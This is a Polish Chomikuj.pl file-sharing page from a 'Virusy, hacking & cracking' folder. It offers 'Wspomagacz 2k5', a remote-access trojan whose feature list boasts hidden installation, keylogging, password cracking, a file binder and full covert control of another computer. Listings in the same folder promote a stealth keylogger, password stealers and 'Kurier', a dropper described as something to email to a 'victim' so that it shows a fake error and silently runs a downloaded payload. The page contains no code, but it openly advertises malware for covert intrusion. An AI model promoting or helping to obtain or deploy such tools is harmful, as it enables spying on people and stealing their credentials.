Wykorzystujemy pliki cookies i podobne technologie w celu usprawnienia korzystania z serwisu Chomikuj.pl oraz wyświetlenia reklam dopasowanych do Twoich potrzeb.

Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, wyrażasz zgodę na ich umieszczanie na Twoim komputerze przez administratora serwisu Chomikuj.pl – Kelo Corporation.

W każdej chwili możesz zmienić swoje ustawienia dotyczące cookies w swojej przeglądarce internetowej. Dowiedz się więcej w naszej Polityce Prywatności - http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Jednocześnie informujemy że zmiana ustawień przeglądarki może spowodować ograniczenie korzystania ze strony Chomikuj.pl.

W przypadku braku twojej zgody na akceptację cookies niestety prosimy o opuszczenie serwisu chomikuj.pl.

Wykorzystanie plików cookies przez Zaufanych Partnerów (dostosowanie reklam do Twoich potrzeb, analiza skuteczności działań marketingowych).

Wyrażam sprzeciw na cookies Zaufanych Partnerów
NIE TAK

Wyrażenie sprzeciwu spowoduje, że wyświetlana Ci reklama nie będzie dopasowana do Twoich preferencji, a będzie to reklama wyświetlona przypadkowo.

Istnieje możliwość zmiany ustawień przeglądarki internetowej w sposób uniemożliwiający przechowywanie plików cookies na urządzeniu końcowym. Można również usunąć pliki cookies, dokonując odpowiednich zmian w ustawieniach przeglądarki internetowej.

Pełną informację na ten temat znajdziesz pod adresem http://chomikuj.pl/PolitykaPrywatnosci.aspx.

Nie masz jeszcze własnego chomika? Załóż konto

wspomagacz_2k5_build29.rar

KLUDI66 / Virusy, hacking & cracking / wspomagacz_2k5_build29.rar
Download: wspomagacz_2k5_build29.rar

0,85 MB

0.0 / 5 (0 głosów)
Co to jest „Wspomagacz 2k5”?

Wspomagacz 2k5 jest to zupełnie nowy program do zdalnego administrowania komputerem. Pewnie zastanawiasz się, do czego to się może przydać? Oj Wspomagacz ma multum zastosowań możesz dzięki niemu będąc w domu przeglądać pliki na komputerze firmowym lub możesz go użyć sprawdzenia czy ktoś używa Twojego komputera możesz też…

Dzięki hasłu zabezpieczającemu dostęp do administrowanego komputera jest strzeżony. W dodatku dzięki temu, że dla Wspomagacz nie jest ważne gdzie znajduje się administrowany komputer (może nie mieć publicznego IP, może być w innej sieci) można administrować dowolny komputer na świecie. Wspomagacz został wyposażony w szereg funkcji, które dają pełną kontrole nad komputerem prawie tak jak byś miał do niego fizyczny dostęp. Wspomagacz podczas swego działania pozostaje w ukryciu.

Wspomagacz 2k5 działa w systemach Windows 98/ME/NT/2000/XP/2003. Do działania wystarczy mu dowolny komputer podłączony do Internetu lub sieci lokalnej.


Co potrafi Wspomagacz 2k5?

- Możliwość klikania myszką (uruchamianie aplikacji, przeciąganie okien)
- Możliwość wykonania tych samych operacji na kilku serwerach w jednym czasie
- Wbudowany Usuwasz
- Wbudowany BINDER
- Możliwość wspólnego rysowania z użytkownikiem administrowanego komputera
- Obsługa archiwów ZIP (pakowanie plików/katalogów)
- KeyLogger off-line
- Sprawdzanie aktywności użytkownika
- Łamanie haseł do kont Gadu-Gadu zapisanych na dysku
- Chat
- Administrowanie zdalnym komputerem
- Dowolna ikona serwera
- Możliwość konfiguracji Klienta wedle własnych preferencji
- Inteligentna Instalacja (niewidoczna) w systemach z serii NT
- Wysłanie tekstu do aktywnej aplikacji
- Dowolna nazwa pliku serwera po instalacji
- Informacje o administrowanym komputerze
- Dowolny klucz w rejestrze
- Właściwość pozwalająca na doklejenia pliku do serwera
- Możliwość wyświetlenia komunikatu o błędzie podczas instalacji serwera w systemie
- Dostępne opcje służące do zabawy (open/close CD-ROM itp.)
- Możliwość ustawienia czasu, po jakim serwer stanie się aktywny
- Możliwość napisania własnego pliku bat i uruchomienia go na zdalnym komputerze
- Dostęp do linii komend
- Automatyczna instalacja w systemie i ukrycie serwera
- PrintScreen
- Możliwość uruchomienia serwera dopiero po kilku restartach komputera
- Pełny dostęp do dysku (kasowanie, uruchamianie, wgrywanie, wysyłanie…)
- Logowanie klawiszy (KeyLogger)
- Lista otwartych okien i aktywnych procesów
- Zabijanie procesów
- Zmykanie okien
- Informacja o aktywnych połączeniach i konfiguracji IP
- Funkcja wyłączenia, rozłączenia, usunięcia serwera
- Zapisywanie domyślnych ustawień konfiguratora do pliku INI
- Kilka innych pomniejszych funkcji

Komentarze:

Nie ma jeszcze żadnego komentarza. Dodaj go jako pierwszy!

Aby dodawać komentarze musisz się zalogować

Inne pliki do pobrania z tego chomika
Program sam wyszukuje i pobiera numery seryjne, cracki, patche do programów, gier itp...
BACKTRACK 3 to jeden z najbardziej znanych programów służących z jednej strony do przeprowadzania testów penetracyjnych w związku z czym niezwykle pomocy przy budowaniu zabezpieczeń dla sieci, z drugiej do wardrivingu, a więc włamywania się do owych sieci. System uruchamia się z płyty, nie trzeba instalować.
Perfect Keylogger Bardzo rozbudowany program umożliwiający niezauważone monitorowanie aktywności komputera. Począwszy od uruchamianych aplikacji, wpisywanych znaków z klawiatury, aż po tworzenie zrzutów ekranu. Program w wersji płatnej jest niewidoczny w systemie i bardzo trudny w usunięciu. Zapis aktywności komputera może wysyłać poprzez sieć LAN lub Internet do autora programu. Program monitorujący prace na komputerze. Aplikacja pracuje calkowicie w tybie Stealth Mode - nikt nie będzie wiedział, ze jest monitorowany! Program umożliwia logowanie do ustawień za pomocą hasła - nie będzie zatem można go wyłączyc! Aplikacja umożliwia logowanie wszystkich znaków, które wprowadzane są z klawiatury, włączajac w to hasła do programów. Oprócz znaków z klawiatury program monitoruje klikniecie myszką! Program pozwala na monitorowanie schowka a także odwiedzonych stron.Aplikacja umożliwia robienie screenshotów i wysyłanie ich na podany e-mail, pozwala na optymalizację systemu Windows oraz umożliwia zdalną kontrolę.
ZASADA DZIAŁANIA: Jeżeli posiadasz jakiś niebezpieczny program i chcesz, aby został uruchomiony na komputerze ofiary to program Kurier jest dla Ciebie. Wystarczy, że zamieścisz w Internecie swoją niebezpieczną aplikację, wpiszesz w programie Kurier link do tej aplikacji, jeżeli sposób uruchomienia aplikacji tego wymaga, możesz w drugim oknie podać parametry z jakimi ma zostać uruchomiona. Trzecie okno, to tekst błędu, jaki ma się wyświetlić dla zmylenia ofiary. To wszystko, naciskasz Generuj i powstaje nam gotowy 40KB skonfigurowany program "kurier", którego np. wysyłasz E-mailem do ofiary. Jeżeli ofiara uruchomi naszego "kuriera", wyświetli się jej okno błędu np. "Plik uszkodzony!", program automatycznie pobierze z Internetu (z podanego mu linku) niebezpieczną aplikację i ją uruchomi bez wiedzy ofiary.
Mail PassView to niewielkie narzędzie służące do odzyskiwania haseł z najpopularniejszych klientów pocztowych.
hasło: virus
Program do odzyskiwania haseł przeznaczony dla systemów z rodziny MS Windows. Pozwala na odzyskanie hasła użytkownika lokalnego komputera, śledzenie pakietów sieciowych, łamanie haseł, zabezpieczeń oraz prostą diagnostykę komputera. Moduł Abel nie jest domyślnie instalowany w systemie, ale może być uruchomiony zdalnie lub lokalnie. Program w pewnych przypadkach może naruszać prawo i stać się narzędziem szpiegowskim. Instrukcja wykradania hasła znajduje się w dziale dokumenty
więcej plików z tego folderu...
Zgłoś jeśli naruszono regulamin
W ramach Chomikuj.pl stosujemy pliki cookies by umożliwić Ci wygodne korzystanie z serwisu. Jeśli nie zmienisz ustawień dotyczących cookies w Twojej przeglądarce, będą one umieszczane na Twoim komputerze. W każdej chwili możesz zmienić swoje ustawienia. Dowiedz się więcej w naszej Polityce Prywatności